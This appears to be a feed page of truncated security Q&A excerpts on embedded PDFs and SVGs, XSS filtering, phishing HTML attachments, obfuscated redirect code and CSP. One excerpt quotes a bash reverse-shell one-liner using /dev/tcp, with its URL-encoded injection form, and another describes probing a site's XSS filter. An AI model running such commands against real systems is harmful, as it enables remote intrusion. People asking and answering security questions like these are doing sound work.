Collaborate Disseminate
Context
On my website, users can upload their PDF files, and then some, other users can view the uploaded PDF files.
I was wondering if this could come with security issues.
The uploaded PDF are simply displayed on the website thanks to: &… Continue reading Website with embedded PDFs and JavaScript for Acrobat
As the available computing power from affordable microcontrollers continues to increase, there is an inevitable blurring of the line between them and the lower tier of application processors capable of …read more Continue reading Render HTML And CSS On An ESP32
I run a site that displays user-generated SVGs. They are untrusted, so they need to be sandboxed.
I currently embed these SVGs using <object> elements. (Unlike <img>, this allows loading external fonts. And unlike using an <… Continue reading What sandbox does an <object> element run in? Can this sandbox be configured?
<html>
<body>
XZ62WASTP12 HLZWIEVAJRWJ 26OGM37NVWCE SZ1LXWRPV4 QP RV8 RJ7RZ7 F2B3H7DQIT9 LZM51 LO54A 9 S06 S0M0TVV2 ZDD9AOTBR YZWED LC670 H4K8 B2QU5 X 4AO OW5BQV4G3 X7X4YDN Q47CZ3G 4
<meta http-equiv="refresh" con… Continue reading What does this code do? [closed]
This is the reverse shell I’m using: sh -i >& /dev/tcp/10.10.14.106/3000 0>&1 and URL encoded is sh+-i+>%26+/dev/tcp/10.10.XX.XX/3000+0>%261+
It used to work just fine and I’d catch the reverse shell with netcat. The p… Continue reading sh reverse shell used to work as of an hour ago but nowthe server returns 500 Internal Server Error. Please take a look at my GET request and response
I received an email from an old colleague asking me to take a look at an attachment. The email didn’t seem suspicious at all, it contained all the right logos, etc. When I opened the attachment it asked me to click on a button, which I did… Continue reading Can an HTML attachment in an email contain a virus?
I was trying to test a potential XSS vulnerability on a website. On the search bar I can see the filtering process happening i.e if I type script> (not with starting <) I can see the same in the searching column just below the search… Continue reading XSS payloads getting filtered but HTML tags are getting rendered. Can we exploit this? [duplicate]
I was browsing a German website when I noticed that during the initial page load there were some non printable characters displayed on the page (like “). As a result the score of the match can’t be seen while the page is still fetching al… Continue reading HTML obfuscation using special fonts [migrated]
someone sent me a link, and when I opened it, it redirected me to an image link, but the link contains a code, so please help me, does this code only show the hacker my ip address or is it also hacking me
The link: http://computer1.epizy.c… Continue reading Was I hacked? help me [closed]
Recently started with web security and came across to CSP. The idea is to implement js file to base jinja2 template and to use it on one of the templates.
<script type="text/javascript" src="./script.js"></scri… Continue reading How can an external js file be securely added to a jinja2 template with csp?